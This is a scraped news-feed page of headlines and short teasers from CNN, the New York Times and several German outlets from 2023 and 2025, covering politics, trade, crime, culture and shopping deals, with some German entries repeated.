• Four out of the five US metro areas with the lowest unemployment are in Florida. Here's why • Opinion: The overlooked problem with raising the retirement age for Social Security

Article link

Date of publish: Sun, 16 Apr 2023 17:29:49 GMT

McDonald's is upgrading its burgers

McDonald's, which has been focusing on upgrading its core items to boost sales, is rolling out a series of changes designed to improve its signature burgers.

Article link

Date of publish: Mon, 17 Apr 2023 16:31:30 GMT

Google-parent stock drops on fears it could lose search market share to AI-powered rivals

Shares of Google-parent Alphabet fell more than 3% in early trading Monday after a report sparked concerns that its core search engine could lose market share to AI-powered rivals, including Microsoft's Bing.

Article link

Date of publish: Mon, 17 Apr 2023 15:52:19 GMT

Bidets save you money and reduce waste — we tested the best options out there
50+ products to make your life easier and our planet cleaner
Mother's Day is around the corner. Here are 50+ thoughtful gifts she'll love
A head-to-toe guide of how men should dress this spring, and where they should shop
42 of the most useful travel products you can buy on Amazon
The 7 best high-yield savings accounts of April 2023
Taxes are due tomorrow. Here's how to file for an extension
Composting is an easy way to reduce food waste. Here's how to do it
We stopped using aluminum foil for cooking and you should too. Here's what to use instead
The beloved Dyson Supersonic hair dryer is at its lowest price ever
Everything you need to know about Way Day 2023, Wayfair's biggest sale of the year
The 10 best Amazon deals to shop this week
Mifepristone saved my life

The ruling earlier this month by a Texas federal judge to suspend the US Food and Drug Administration's approval of a drug that is used frequently for medication abortions, is very personal for me.

Article link

Date of publish: Tue, 18 Apr 2023 11:30:00 GMT

The 2024 presidential alternative many voters will want
Why isn't the House Judiciary Committee looking into Thomas?

On Monday, the GOP-controlled House Judiciary Committee — chaired by Donald Trump ally Rep. Jim Jordan — is set to hold a field hearing in New York City called "Victims of Violent Crime in Manhattan." A statement bills the hearing as an examination of how, the Judiciary Committee says, Manhattan District Attorney Alvin Bragg's policies have "led to an increase in violent crime and a dangerous community for New York City residents."

Article link

Date of publish: Mon, 17 Apr 2023 11:37:37 GMT

Top secrets come spilling out

In 1917, British analysts deciphered a coded message the German foreign minister sent to one of his country's diplomats vowing to begin "unrestricted submarine warfare" and seeking to win over Mexico with a promise to "reconquer the lost territory in Texas, New Mexico and Arizona" if the US entered the world war. When it became public, the Zimmerman Telegram caused a sensation, helping propel the US into the conflict against Germany.

Article link

Date of publish: Sun, 16 Apr 2023 11:22:36 GMT

How did Sudan go from casting off despotic rule to this?

Four years ago, almost to the day, the people of Sudan were celebrating a revolution after overthrowing longtime dictator Omar al-Bashir. Now the East African country faces the possibility of a complete collapse similar to the chaos we see today in Yemen or Libya.

Article link

Date of publish: Mon, 17 Apr 2023 22:45:23 GMT

Michelle Yeoh set to return in new 'Star Trek' movie

Live long and prosper, Michelle Yeoh.

Article link

Date of publish: Tue, 18 Apr 2023 19:11:23 GMT

Recap: 'Succession' finds dark humor in the aftershocks

After the shock came the aftershocks, the power vacuum, and perhaps most significantly and impressively, the laughs, as "Succession" pivoted to face life after Logan Roy, in an episode that finally put the HBO show's title into full flower.

Article link

Date of publish: Mon, 17 Apr 2023 02:28:12 GMT

'Yellowjackets' leans hard into '90s music nostalgia, and we're here for it

Of the many dark gifts Showtime's eerie hit series "Yellowjackets" serves up for us, the juiciest this season is by far the music.

Article link

Date of publish: Mon, 01 May 2023 23:02:04 GMT

Jeremy Renner revisits 'the amazing group of people' who helped him recover from his accident

Jeremy Renner is continuing his recovery after his devastating snowplow accident in January, and recognizing those who've helped him along the way.

Article link

Date of publish: Sun, 16 Apr 2023 19:04:10 GMT

Review: 'Barry' takes a whack at its farewell season

"Barry" has taken chances from the very beginning, which is certainly true of a fourth and final season that picks up where the third left off, with its hitman-turned-wannabe actor getting arrested. That paves the way for an even darker season that accentuates the show's ensemble aspect while leaning a little too heavily on blurring lines with flights of fancy.

Article link

Date of publish: Fri, 14 Apr 2023 12:33:08 GMT

NYT > Top Stories

Political Costs of Trump Tax Cuts, Medicaid and ‘Debt Slavery’

As the Senate prepares to vote on a key piece of the president’s domestic agenda, prominent critics, including Elon Musk, are speaking out.

Article link

Date of publish: Mon, 30 Jun 2025 14:07:16 +0000

New Cost of Trump’s Bill, Canada Backs Down in Trade Dispute, Gen Z’s Retirement Plan

Plus, the tricky science behind lime green Jell-O.

Article link

Date of publish: Mon, 30 Jun 2025 11:25:37 +0000

Trump Vowed to Dismantle MS-13. His Deal With Bukele Threatens That Effort.

Top gang leaders being sent back to El Salvador were part of a lengthy federal investigation that has amassed evidence of a corrupt pact between the Bukele government and MS-13.

Article link

Date of publish: Mon, 30 Jun 2025 09:00:33 +0000

Why Is Trump Returning MS-13 Leaders to El Salvador? Takeaways From Times Reporting.

The agreement with Nayib Bukele, the president of El Salvador, is undermining a long-running federal investigation into the gang, according to people familiar with the inquiry.

Article link

Date of publish: Mon, 30 Jun 2025 13:37:39 +0000

Canada to Scrap Digital Services Tax That Led Trump to Suspend Trade Talks

The government said on Sunday night that it would cancel its tax on American technology companies, handing a victory to the Trump administration.

Article link

Date of publish: Mon, 30 Jun 2025 03:52:54 +0000

Trump Wants America to Make iPhones. Here’s How India Is Doing It.

India is carving out a new space for Foxconn and other high-end manufacturers, just as President Trump demands American companies do at home.

Article link

Date of publish: Mon, 30 Jun 2025 12:44:07 +0000

How Tariffs Are Affecting Wedding Dress Prices

Jordyn Holman, a New York Times business reporter, is planning a wedding. To find out how tariffs are affecting the bridal industry, she visited three different dress shops selling gowns from around the world.

Article link

Date of publish: Mon, 30 Jun 2025 09:00:12 +0000

Trump’s Tariffs May Push This American Company to Move Jobs to China

The experience of a company in the textile business illustrates how the trade war could force some industries to shift production out of the United States.

Article link

Date of publish: Mon, 30 Jun 2025 04:01:21 +0000

As Trade Deadline Nears, Europe Preps for a Scant Outline of a Deal

President Trump’s administration once promised 90 deals in 90 days. When it comes to the European Union, it may be more of a framework.

Article link

Date of publish: Mon, 30 Jun 2025 09:02:37 +0000

2 Firefighters Killed in Idaho Sniper Ambush

Firefighters were responding to a blaze in the panhandle of Idaho when the shooting happened, a sheriff said. The body of a suspect was recovered on Sunday evening.

Article link

Date of publish: Mon, 30 Jun 2025 13:52:09 +0000

What We Know About the Idaho Shooting

The authorities said a gunman started a wildfire to lure firefighters, then ambushed them in a sniper attack.

Article link

Date of publish: Mon, 30 Jun 2025 12:16:59 +0000

Trump’s Immigration Crackdown in L.A. Upends Everyday Life for Latinos

Anxiety over federal immigration detentions has gripped thousands of residents in the area and led many to limit the time they spend in public.

Article link

Date of publish: Mon, 30 Jun 2025 09:01:35 +0000

Inside the Roosevelt, a Migrant Shelter No More, Echoes of a Crisis

The Midtown Manhattan hotel opened as a shelter in 2023. That mission has ended as border crossings plummet, slowing the flow of migrants.

Article link

Date of publish: Mon, 30 Jun 2025 14:14:50 +0000

The Summer Job, a Rite of Passage for Teens, May Be Fading Away

As businesses face economic uncertainty, seasonal work is harder to find, pushing the unemployment rate for teenagers above 13 percent.

Article link

Date of publish: Mon, 30 Jun 2025 09:01:48 +0000

How Do You Teach Computer Science in the A.I. Era?

Universities across the country are scrambling to understand the implications of generative A.I.’s transformation of technology.

Article link

Date of publish: Mon, 30 Jun 2025 09:01:10 +0000

Are You Applying for Tech Jobs or Tech Internships? We Want to Hear About It.

Companies using A.I. tools to automate tasks like coding are changing job prospects for recent grads and college students. Tell us about your experiences.

Article link

Date of publish: Mon, 30 Jun 2025 09:03:10 +0000

Drifting From the West’s Orbit, Russians Find a New Role Model in China

China has become trendy for Russians who once worshiped everything Western. Young people are learning Mandarin, and Chinese culture and goods have become ubiquitous in Moscow.

Article link

Date of publish: Mon, 30 Jun 2025 09:00:11 +0000

Taiwan’s President Takes on China, and His Opponents, in Speaking Tour

Lai Ching-te is ramping up his warnings about China’s threat to Taiwan. Critics say he is stoking divisions, and risking blowback from Beijing.

Article link

Date of publish: Mon, 30 Jun 2025 12:10:28 +0000

A Year After ‘Loveless Landslide,’ U.K. Leader Is Even Less Popular

With scores of Labour Party lawmakers in open revolt and voters signaling their distaste, some are urging Prime Minister Keir Starmer to abandon caution and pivot left.

Article link

Date of publish: Mon, 30 Jun 2025 10:26:11 +0000

What the University of Virginia Should Have Done

The university should have stood up to the Justice Department.

Article link

Date of publish: Mon, 30 Jun 2025 09:03:09 +0000

Corporate Politics

We take a look at why businesses are turning away from political causes.

Article link

Date of publish: Mon, 30 Jun 2025 11:02:04 +0000

At the Sean ‘Diddy’ Combs Trial, Jurors Are Ready to Deliberate

The panel of 12 will be asked to decide whether the music mogul is guilty of racketeering conspiracy and sex trafficking.

Article link

Date of publish: Mon, 30 Jun 2025 12:02:25 +0000

2 Shot Near Stonewall Inn After NYC’s Pride March

One of the victims was in critical condition after being shot in the head. Mayor Eric Adams said the shooting occurred as Pride celebrations were ending.

Article link

Date of publish: Mon, 30 Jun 2025 14:05:48 +0000

From Iran-Israel Strikes to Russia’s War: How Conflicts Reshape Air Travel

Whether caused by a long war or brief skirmish, the closing of skies to air travel is having big effects on cost, convenience and safety.

Article link

Date of publish: Mon, 30 Jun 2025 13:18:12 +0000

German News

News sites below.

DER SPIEGEL - Schlagzeilen – Tops

Russland-Ukraine-Krieg: Warum Moskau einen toten russischen Soldaten überstellt hat

Russland überstellt einen toten russischen Soldaten an die Ukraine. In den Leichensäcken sollten eigentlich gefallene ukrainische Kämpfer liegen. Der makabere Vorgang hat auch mit Donald Trump zu tun.

Article link

Date of publish: Mon, 30 Jun 2025 14:51:00 +0200

Wolfgang Böhmer: Der Mann, den Angela Merkel fragte, was der Blödsinn soll - Nachruf

Wenn er gewusst hätte, was auf ihn zukommt, wäre Wolfgang Böhmer vielleicht Chefarzt geblieben. Den Wechsel in die Politik hat er dennoch nicht bereut.

Article link

Date of publish: Mon, 30 Jun 2025 12:44:00 +0200

Inflation: Teuerungsrate in Deutschland im Juni überraschend gesunken

Die Verbraucherpreise in Deutschland sind im Juni etwas weniger stark gestiegen als im Mai. Waren und Dienstleistungen kosteten durchschnittlich 2,0 Prozent mehr als ein Jahr zuvor. Energie wurde günstiger, Lebensmittel dagegen teurer.

Article link

Date of publish: Mon, 30 Jun 2025 14:07:00 +0200

Nachrichten - WELT

Jetzt wird der letzte verschlafene Fleck im Herzen Hamburgs hübsch gemacht

Planten un Blomen im Rücken, das Gesicht zur Alster: Im Windschatten der prominenten Nachbarschaft litten die Colonnaden, eine der schönsten, kleinen Fußgängerzonen der Hamburger Innenstadt, unter den Umbrüchen in der Nachbarschaft. Nun fiel der Startschuss für eine aufwendige Umgestaltung.

Article link

Date of publish: Mon, 30 Jun 2025 14:30:56 GMT

Warum Polen bei der Kernenergie plötzlich wieder auf Berlin hoffen kann

In Polen empfinden viele die deutsche Energiewende als schweren Fehler und reagieren empfindlich auf Belehrungen des Nachbarn. Wirtschaftsministerin Reiche ändert bei ihrem Antrittsbesuch die alten Vorzeichen – sogar bei einem besonders heiklen Thema.

Article link

Date of publish: Mon, 30 Jun 2025 14:29:32 GMT

Beyoncé bricht Auftritt ab

Article link

Date of publish: Mon, 30 Jun 2025 14:27:16 GMT

Nachrichten: DIE ZEIT Newsfeed

Nordrhein-Westfalen: 16-Jähriger stellt sich nach gewaltsamem Tod von Mutter und Kind

Nach dem Fund einer toten Frau und ihres Kindes in Dorsten gibt es einen Tatverdächtigen. Ein 16-Jähriger hat sich der Polizei gestellt.

Article link

Date of publish: Mon, 30 Jun 2025 14:29:50 -0000

Streit um Stromsteuer: SPD-Generalsekretär wirft Union Verhalten wie bei der Ampel vor

Die SPD sei bereit für eine allgemeine Senkung der Stromsteuer, sagte ihr Generalsekretär. Nur müsse die Union zur Finanzierung auch "Lieblingsprojekte neu priorisieren".

Article link

Date of publish: Mon, 30 Jun 2025 14:28:29 -0000

Tagebuch-Techniken: Wie Sie mit einem Tagebuch Ihr Leben verbessern

"Liebes Tagebuch, bringt das was?" Wie man ein Tagebuch so führt, dass es in jeder Lebenssituation hilft, erklärt der Optimierungspodcast.

Article link

Date of publish: Mon, 30 Jun 2025 14:22:26 -0000

netzpolitik.org

KW 26: Die Woche, in der wir uns wegen Stigmatisierung gesorgt haben

Fraktal, das ein bisschen wie ein Seestern aussieht.
– Fraktal, generiert mit MandelBrowser von Tomasz Śmigielski
Die 26. Kalenderwoche geht zu Ende. Wir haben 13 neue Texte mit insgesamt 91.307 Zeichen veröffentlicht. Willkommen zum netzpolitischen Wochenrückblick.

Article link

Date of publish: Sat, 28 Jun 2025 08:49:44 +0000

Bremse oder Motor: EU-Kommission stellt Netzneutralität zur Debatte

Telekom-Chef Timotheus Höttges, Vorstandsvorsitzender der Deutschen Telekom, mit einem historischen Mobiltelefon Pocky vor den Aktionären.
Manche Netzbetreiber stellen Netzneutralität als Innovationsbremse dar und wollen sie aufweichen. (Symbolbild: Telekom-Chef Timotheus Höttges mit dem historischen Mobiltelefon Pocky.) – Alle Rechte vorbehalten IMAGO / Panama Pictures
Noch in diesem Jahr will die EU-Kommission die Regeln für die europäischen Telekommunikationsmärkte weitflächig überarbeiten. Mit dem Digital Networks Act steht plötzlich auch die Netzneutralität zur Debatte – und niemand kann beantworten, warum genau. Eine Spurensuche.

Article link

Date of publish: Fri, 27 Jun 2025 11:59:03 +0000

Trotz Fristverlängerung: Schwarz-Rot peitscht Änderung des BKA-Gesetzes durch den Bundestag

Holger Muench und Alexander Dobrindt bei der Bundespressekonferenz
Die Chefs von BKA und Innenministerium bei einer Pressekonferenz (Archivbild) – Alle Rechte vorbehalten IMAGO / IPON
Das BKA-Gesetz war teilweise verfassungswidrig. Zu unklar waren die Regeln, wann Beschuldigte in Polizeidatenbanken gespeichert werden dürfen. Zu weit waren die Befugnisse, um mögliche Kontaktpersonen von Terrorverdächtigen zu überwachen. Doch die Neuregelung, die der Bundestag gestern verabschiedete, kann Fachleute nicht überzeugen.

Article link

Date of publish: Fri, 27 Jun 2025 09:01:24 +0000

Golem.de

Anzeige: Apple iPhone 16e zum neuen Tiefpreis bei Amazon

Der Prime Day wirft seine Schatten voraus. Schon vor Beginn des viertägigen Sales-Events sind Produkte wie das iPhone 16e deutlich reduziert. (iPhone 16, iPhone)

Article link

Date of publish: Mon, 30 Jun 2025 16:28:02 +0200

Mit AST Spacemobile: Vodafone startet Satellitenunternehmen Satco in Luxemburg

Satco bietet Direct-to-Device-Dienst für Europa. Vodafone und AST Spacemobile wollen dafür Frequenzen von der Konkurrenz, die auch Starlink haben will. (Vodafone, Mobilfunk)

Article link

Date of publish: Mon, 30 Jun 2025 15:49:02 +0200

Anzeige: Endoskopkamera mit Licht bei Amazon für nur 17,80 Euro

Amazon hat eine Endoskopkamera mit Licht im Angebot, mit der man schwer erreichbare Stellen per Smartphone inspizieren kann. (Technik/Hardware)

Article link

Date of publish: Mon, 30 Jun 2025 15:25:02 +0200

DER SPIEGEL - Schlagzeilen – Tops

Russland-Ukraine-Krieg: Warum Moskau einen toten russischen Soldaten überstellt hat

Russland überstellt einen toten russischen Soldaten an die Ukraine. In den Leichensäcken sollten eigentlich gefallene ukrainische Kämpfer liegen. Der makabere Vorgang hat auch mit Donald Trump zu tun.

Article link

Date of publish: Mon, 30 Jun 2025 14:51:00 +0200

Wolfgang Böhmer: Der Mann, den Angela Merkel fragte, was der Blödsinn soll - Nachruf

Wenn er gewusst hätte, was auf ihn zukommt, wäre Wolfgang Böhmer vielleicht Chefarzt geblieben. Den Wechsel in die Politik hat er dennoch nicht bereut.

Article link

Date of publish: Mon, 30 Jun 2025 12:44:00 +0200

Inflation: Teuerungsrate in Deutschland im Juni überraschend gesunken

Die Verbraucherpreise in Deutschland sind im Juni etwas weniger stark gestiegen als im Mai. Waren und Dienstleistungen kosteten durchschnittlich 2,0 Prozent mehr als ein Jahr zuvor. Energie wurde günstiger, Lebensmittel dagegen teurer.

Article link

Date of publish: Mon, 30 Jun 2025 14:07:00 +0200

Michael Sommer: Langjähriger DGB-Chef ist tot

Von 2002 bis 2014 war er der Vorsitzende des Deutschen Gewerkschaftsbundes, nun ist Michael Sommer gestorben. Er wurde 73 Jahre alt.

Article link

Date of publish: Mon, 30 Jun 2025 15:20:00 +0200

Flugpläne in Deutschland: Wohin Sie dieses Jahr noch direkt fliegen können

Viele Airlines haben ihre Flugpläne seit Corona ausgedünnt. Doch noch immer sind von Deutschland aus 383 Ziele direkt erreichbar. Unser interaktiver Globus zeigt, von wo aus Sie wohin kommen.

Article link

Date of publish: Mon, 30 Jun 2025 12:14:00 +0200

Nahost: Israel will diplomatische Beziehungen zu Syrien und dem Libanon

Normalisiert Israel sein Verhältnis zu Syrien und dem Libanon? Außenminister Gideon Sa’ar zeigte sich offen für die Aufnahme diplomatischer Beziehungen. In einem Punkt blieb er jedoch unnachgiebig.

Article link

Date of publish: Mon, 30 Jun 2025 15:10:00 +0200

Bob Vylan: Washington verweigert Rap-Duo Visa für US-Tour

Nach ihrem Auftritt beim Glastonbury-Festival ist das britische Duo Bob Vylan ins Visier der Politik geraten. Großbritanniens Premier Starmer hatte die BBC-Ausstrahlung kritisiert. Jetzt legt das US-Außenministerium nach.

Article link

Date of publish: Mon, 30 Jun 2025 13:13:00 +0200

Dorsten: 16-Jähriger stellt sich nach Tod von Frau und Kleinkind der Polizei

Ein Jugendlicher hat nach dem Leichenfund an einem Waldweg im nordrhein-westfälischen Dorsten eine Beteiligung an der Tat zugegeben. Auch zur Identität der Opfer gibt es neue Erkenntnisse.

Article link

Date of publish: Mon, 30 Jun 2025 14:55:00 +0200

Steuern in der Geschichte: »Gott gibt den Menschen Luft, das Gesetz verkauft sie ihnen«

Fenstersteuer, Biersteuer, Haarpudersteuer, Mordsteuer: In der Geschichte gängelten Mächtige die Menschen immer wieder durch teils zweifelhafte Abgaben. Eine Steuerart eignete sich dafür besonders gut.

Article link

Date of publish: Mon, 30 Jun 2025 15:31:00 +0200

Hitze und Trockenheit: Südwesten Deutschlands ist Wärmehotspot

Jetzt wird es richtig heiß. Bis zu 39 Grad werden in den kommenden Tagen in Deutschland erwartet. Schon der Juni war ungewöhnlich warm, vor allem im Südwesten. Behörden könnten die Bürger nun zum Wassersparen zwingen.

Article link

Date of publish: Mon, 30 Jun 2025 14:48:00 +0200

Koblenz: Schule darf 16-Jährigen nach Verkauf von Schlagringen und Springmessern vorläufig ausschließen

Ein Jugendlicher machte auf dem Schulhof Waffengeschäfte – die harten Konsequenzen muss er nun hinnehmen. Ein Gericht hat entschieden: Der Schulausschluss des 16-Jährigen war rechtens.

Article link

Date of publish: Mon, 30 Jun 2025 14:46:00 +0200

Wimbledon 2025: Eva Lys gewinnt in drei Sätzen

Die erste von vier deutschen Tennisspielerinnen hat die zweite Runde in Wimbledon erreicht. Dabei erlebte Eva Lys in zweieinhalb Stunden ein Auf und Ab. Die zweimalige Finalistin Ons Jabeur gab früh auf.

Article link

Date of publish: Mon, 30 Jun 2025 15:01:00 +0200

Untersuchung: Was Menschen zu coolen Menschen macht

Extrovertiert, abenteuerlustig, unabhängig: Forscher haben Charakterzüge festgehalten, die Menschen in den Augen anderer Personen cool wirken lassen. Über die Kontinente hinweg gibt es dabei eine Gemeinsamkeit.

Article link

Date of publish: Mon, 30 Jun 2025 16:27:00 +0200

Urlaub in Österreich: Zwei Drittel haben kein Problem mit Zahl der Touristen – oder wollen noch mehr

Massentourismus im eigenen Land? Die meisten Österreicher haben laut einer Umfrage damit kein Problem. Doch es gibt Ausnahmen.

Article link

Date of publish: Mon, 30 Jun 2025 15:16:00 +0200

Südkorea: Lovebugs machen Menschen in Seoul zu schaffen

Sie liegen wie ein Teppich auf dem Boden, kleben sich an T-Shirts, Arme, Beine: In Südkorea machen sogenannte Lovebugs den Menschen zu schaffen. Mit Gift wollen die Behörden die Insekten aber nicht bekämpfen.

Article link

Date of publish: Mon, 30 Jun 2025 14:25:00 +0200

James Cameron: Regisseur schwor Überlebendem, einen Film über Hiroshima zu drehen

Regisseur James Cameron arbeitet an einem Film über den Atombombenabwurf auf Hiroshima im Jahr 1945. Inspiriert wurde er offenbar auch von einem Mann, der das Grauen selbst miterlebt hatte.

Article link

Date of publish: Mon, 30 Jun 2025 12:14:00 +0200

Fettleber: Wie Sie sich vor der »stillen Epidemie« schützen können

Jeder vierte Mensch in Deutschland hat eine Fettleber und die wenigsten wissen davon. Hier erklärt die Leberspezialistin Münevver Demir, wie Sie sich vor der »stillen Epidemie« schützen können und was die Leber regeneriert.

Article link

Date of publish: Thu, 20 Mar 2025 05:30:00 +0100

Jeff Bezos: Was seine Hochzeit mit Venedig gemacht hat

Venedig verfällt. Doch statt die Einnahmen aus gigantischen Millionärshochzeiten in die Zukunft der Stadt zu investieren, bemühen sich die Verantwortlichen, ihren drohenden Untergang zu verschleiern.

Article link

Date of publish: Sun, 29 Jun 2025 17:20:00 +0200

Caroline Wahl: In Kiel habe ich mich nicht verknallt. In Kiel habe ich mich verliebt

Es gibt keine Frage, die ich so oft beantworten muss, wie: Du bist nach Kiel gezogen? Warum Kiel? Warum bist du ausgerechnet nach Kiel gezogen?

Article link

Date of publish: Sat, 21 Jun 2025 13:15:00 +0200

AirTags, Moto Tags und SmartTag2 im Test: Drei kleine Dingefinder

Welches Finde-Gadget spürt verlorene Gegenstände am schnellsten auf? Wir haben Bluetooth-Tracker von Apple, Google und Samsung gegeneinander antreten lassen.

Article link

Date of publish: Sat, 28 Jun 2025 18:35:00 +0200

Fußball-EM der Frauen 2025: Klara Bühl im Kinder-Interview - »Wir müssen vor keinem Gegner Angst haben«

Klara Bühl spielt in der deutschen Nationalmannschaft. Mit den Kinderreporterinnen von DEIN SPIEGEL spricht sie über die anstehende Europameisterschaft, verlorene Zweikämpfe und ihr Hobby, das Häkeln.

Article link

Date of publish: Sun, 29 Jun 2025 12:49:00 +0200

Nachrichten - WELT

Jetzt wird der letzte verschlafene Fleck im Herzen Hamburgs hübsch gemacht

Planten un Blomen im Rücken, das Gesicht zur Alster: Im Windschatten der prominenten Nachbarschaft litten die Colonnaden, eine der schönsten, kleinen Fußgängerzonen der Hamburger Innenstadt, unter den Umbrüchen in der Nachbarschaft. Nun fiel der Startschuss für eine aufwendige Umgestaltung.

Article link

Date of publish: Mon, 30 Jun 2025 14:30:56 GMT

Warum Polen bei der Kernenergie plötzlich wieder auf Berlin hoffen kann

In Polen empfinden viele die deutsche Energiewende als schweren Fehler und reagieren empfindlich auf Belehrungen des Nachbarn. Wirtschaftsministerin Reiche ändert bei ihrem Antrittsbesuch die alten Vorzeichen – sogar bei einem besonders heiklen Thema.

Article link

Date of publish: Mon, 30 Jun 2025 14:29:32 GMT

Beyoncé bricht Auftritt ab

Article link

Date of publish: Mon, 30 Jun 2025 14:27:16 GMT

Skandal um Geschlechtertrennung im Hörsaal – Berliner Charité zieht Konsequenzen

Bei einem Vortrag einer muslimischen Studentengruppe saßen Männer und Frauen getrennt voneinander. Das hat nun Folgen für die Gruppe. Die Charité will „MedIslam Collective“ ab sofort keine Räume mehr zur Verfügung stellen.

Article link

Date of publish: Mon, 30 Jun 2025 14:17:46 GMT

Frau und Kind tot in Dorsten – 16-Jähriger gesteht Tatbeteiligung am Tatort

Nach dem Tod einer Frau und eines einjährigen Kindes in Dorsten (NRW) hat die Polizei einen 16-Jährigen festgenommen. Der Jugendliche hatte sich am Tatort gemeldet und eine Tatbeteiligung gestanden, teilte die Polizei Recklinghausen mit.

Article link

Date of publish: Mon, 30 Jun 2025 14:10:43 GMT

Lagerfelds Villa wird versteigert

Article link

Date of publish: Mon, 30 Jun 2025 14:05:56 GMT

„Eine gigantische Einschlagskraft von etwa 4000 Hiroshima-Bomben“

Seit dem sogenannten Tunguska-Ereignis am 30. Juni 1908 findet jedes Jahr an diesem Tag der „Internationale Tag der Asteroiden“ statt. Über die Gefahr von Asteroideneinschlägen spricht Ulrich Walter, Professor für Raumfahrttechnik, im WELT-Interview.

Article link

Date of publish: Mon, 30 Jun 2025 14:03:34 GMT

Bundesregierung reagiert zurückhaltend auf SPD-Beschluss zu AfD-Verbotsverfahren

Während die SPD-Basis ein mögliches AfD-Verbotsverfahren vorbereitet, zeigt sich die Bundesregierung weiter skeptisch. Kanzler Merz wolle die Partei politisch stellen, nicht juristisch verbieten, heißt es.

Article link

Date of publish: Mon, 30 Jun 2025 13:58:27 GMT

BBC bedauert Äußerungen bei Festival

Article link

Date of publish: Mon, 30 Jun 2025 13:55:18 GMT

Islamistischer TikTok-Prediger gesteht Spendenbetrug im großen Stil

Fast eine halbe Million Euro Spenden eingeworben, nur einen Bruchteil für humanitäre Zwecke weitergeleitet: Das wirft die Anklage dem reichweitenstarken islamistischen TikTok-Prediger „Abdelhamid“ vor. Auch wegen Sozialleistungsbetrugs wird gegen ihn ermittelt.

Article link

Date of publish: Mon, 30 Jun 2025 13:50:37 GMT

Ein Fresko für Frankreich, ein Massengrab für Russland

In Soest wird eine vergessene Gefängniskapelle zum Museum – und damit auch zum Mahnmal für einen Genozid, den viele Deutsche bis heute nicht kennen wollen: das gewollte Sterben sowjetischer Kriegsgefangener mitten in Westfalen.

Article link

Date of publish: Mon, 30 Jun 2025 13:48:42 GMT

Die Lücke in Dobrindts Grenzregime

Jeden Monat kommen offenbar Hunderte Ausländer illegal aus anderen Schengen-Staaten mit dem Flugzeug nach Deutschland. Die Bundespolizei hat „keine Befugnis“, diese Migranten direkt zurückzuweisen. Schleusern bietet das eine Chance.

Article link

Date of publish: Mon, 30 Jun 2025 13:44:34 GMT

„Deutsche Unternehmen sind in der Ukraine weiter als die Politik“

Sicherheitsexperte Nico Lange analysiert die Pressekonferenz von Außenminister Johann Wadephul (CDU) in Kiew. Deutsche Unternehmen seien im Rüstungsbereich schon lange weiter in der Ukraine als die Politik. „Das hilft alle mal mehr als diese Worte der Aufmunterung.“

Article link

Date of publish: Mon, 30 Jun 2025 13:37:30 GMT

Man sollte nie Hunde und Kinder gleichzeitig im Auto vergessen

Im Vergleich zu glühender Lava sind die 39 Grad in Braunschweig lachhaft.

Article link

Date of publish: Mon, 30 Jun 2025 13:36:58 GMT

Die Lektion der Punk-Apokalyptiker

Inmitten der aktuellen Kriegs-Konjunktur erinnert uns eine alte Platte der Punk-Veteranen von den Ramones daran, wie einfach die Welt aus amerikanischer Perspektive einmal war und wie „retro“ die Angst vor einem Atomkrieg sein könnte. Aber ist es noch immer so?

Article link

Date of publish: Mon, 30 Jun 2025 13:36:41 GMT

„Morgen extremer Arschmuskelkater“ – Eva Lys trotzt der Hitze

Im Vorjahr setzte es für Eva Lys noch ein Erstrunden-Aus beim Rasenklassiker von Wimbledon. Nun machte es die 23 Jahre alte Tennisspielerin besser – und das sogar trotz einer Kniebehandlung im dritten Sitz und großer Hitze.

Article link

Date of publish: Mon, 30 Jun 2025 13:36:25 GMT

„Sind gestorben, weil sie im See eine Abbruchkante übersehen haben“

Die Zahl der Badetoten steigt – gerade erst gab es das tödlichste Badewochenende seit einigen Jahren in Deutschland. Woran liegt das? Die Chefin der Deutschen Lebens-Rettungs-Gesellschaft, Ute Vogt, erklärt die Gründe – und welche Rolle die Migration spielt.

Article link

Date of publish: Mon, 30 Jun 2025 13:33:42 GMT

Tour de France 2025 – Favoriten, Höhepunkte, Etappenplan und mehr

Die 112. Tour de France hat auf 3338,8 Kilometern einiges zu bieten – darunter fünf Bergankünfte wie den berüchtigten Mont Ventoux. Favoriten, Titelverteidiger, deutsche Starter, Zeitplan und alles, was Sie zur Tour de France 2025 wissen müssen.

Article link

Date of publish: Mon, 30 Jun 2025 13:30:51 GMT

Bas ist „irritiert von Angriffen“ des Koalitionspartners – Union will bei Bürgergeld sparen

Die Koalition streitet über die Stromsteuer. Um eine Senkung für alle zu finanzieren, will die Union beim Bürgergeld sparen. Doch bei den Sozialdemokraten ist der Ärger groß.

Article link

Date of publish: Mon, 30 Jun 2025 13:26:00 GMT

„Offene Grenzen und ein gut ausgestatteter Sozialstaat schließen sich aus“

Angela Merkel hat in einem Interview die Asylpolitik des unionsgeführten Innenministeriums kritisiert, das bei Grenzkontrollen Asylsuchende zurückweisen lässt. „Wir brauchen keine Belehrungen von der Altkanzlerin“, sagt CDU-Politiker Wolfgang Bosbach bei WELT TV.

Article link

Date of publish: Mon, 30 Jun 2025 13:16:50 GMT

Früherer DGB-Chef Michael Sommer ist tot

Michael Sommer, lange Jahre Vorsitzender des Deutschen Gewerkschaftsbunds (DGB), ist gestorben. Sommer wurde 73 Jahre alt. Der DGB würdigt seine Verdienste bei der Durchsetzung des gesetzlichen Mindestlohns.

Article link

Date of publish: Mon, 30 Jun 2025 13:14:47 GMT

Wird das Bürgergeld gekürzt, um die Stromsteuer zu senken?

Der Streit um die Stromsteuer in der Koalition hält an. Kanzleramtschef Frei zeigt sich offen, durch andere Einsparungen im Bundeshaushalt die Stromsteuer doch zu senken. Das Budget für Sozialleistungen, darunter das Bürgergeld, wolle die Union schon länger überarbeiten, so Reporterin Christina Lewinsky.

Article link

Date of publish: Mon, 30 Jun 2025 13:13:32 GMT

Bitte besser regieren, anstatt auf Verbote zu setzen

Die SPD glaubt offenbar, ein Verbotsverfahren würde die vielfältigen Probleme lösen, welche die AfD so stark machen. Welch Fehlschluss! Die 10,3 Millionen Bundesbürger, die im Februar für die AfD gestimmt haben, sind nicht allesamt Nazis.

Article link

Date of publish: Mon, 30 Jun 2025 13:05:28 GMT

Gesünderes Leben durch richtiges Atmen – das rät der Experte

Über die richtige Atmung lässt sich viel mehr steuern als bisher angenommen. Körper und Geist reagieren empfindlich auf hektische Atemzüge. Ein Mediziner erklärt, was bei Störungen passiert – und wie man bei Beschwerden vorgehen sollte.

Article link

Date of publish: Mon, 30 Jun 2025 12:50:38 GMT

Geschlechtertrennung? Die Charité hat ein politisches Problem

Bei einer Veranstaltung der Gruppe „Medislam Collective“ kam es zu einer Geschlechtertrennung im Publikum – und das in den Räumen der Berliner Charité. Der Mediziner Jonas Schmidt-Chanasit Mediziner ist empört – und warnt vor gefährlichen Transformationsprozessen.

Article link

